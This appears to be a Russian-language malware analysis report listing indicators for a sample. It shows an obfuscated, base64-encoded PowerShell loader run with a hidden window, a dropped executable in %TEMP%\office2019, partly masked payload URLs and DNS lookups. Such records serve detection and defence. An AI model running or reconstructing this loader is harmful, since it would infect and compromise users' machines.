Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABPAGEAcwA5AGsAbwA2AD0AKAAnAFoAdwBlADgAJwArACcAaABzADQAJwApADsALgAoACcAbgAnACsAJwBlAHcALQBpACcAKwAnAHQAZQBtACcAKQAgACQAZQBuAFYAOgB0AGUAbQBwAFwAbwBGAGYAaQBDAEUAMgAwADEAOQAgAC0AaQB0AGUAbQB0AH...
- %TEMP%\office2019\tuizqjt.exe
- %TEMP%\office2019\tuizqjt.exe
- %TEMP%\office2019\tuizqjt.exe
- http://th####ishmedia.nl/Dev/8/
- http://tu##k.de/cgi-bin/LROR4jp/
- http://va#i.de/Minecraft/bHY/
- http://va###ngen.de/bilder/k5a0v3Z/
- http://to##-mi.de/cgi-bin/iQ/
- DNS ASK st###snet.nl
- DNS ASK th####ishmedia.nl
- DNS ASK di####awsmedia.com
- DNS ASK tu##k.de
- DNS ASK va#i.de
- DNS ASK va###ngen.de
- DNS ASK to##-mi.de
- DNS ASK co###thief.dk
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABPAGEAcwA5AGsAbwA2AD0AKAAnAFoAdwBlADgAJwArACcAaABzADQAJwApADsALgAoACcAbgAnACsAJwBlAHcALQBpACcAKwAnAHQAZQBtACcAKQAgACQAZQBuAFYAOgB0AGUAbQBwAFwAbwBGAGYAaQBDAEUAMgAwADEAOQAgAC0AaQB0AGUAbQB0AH...' (со скрытым окном)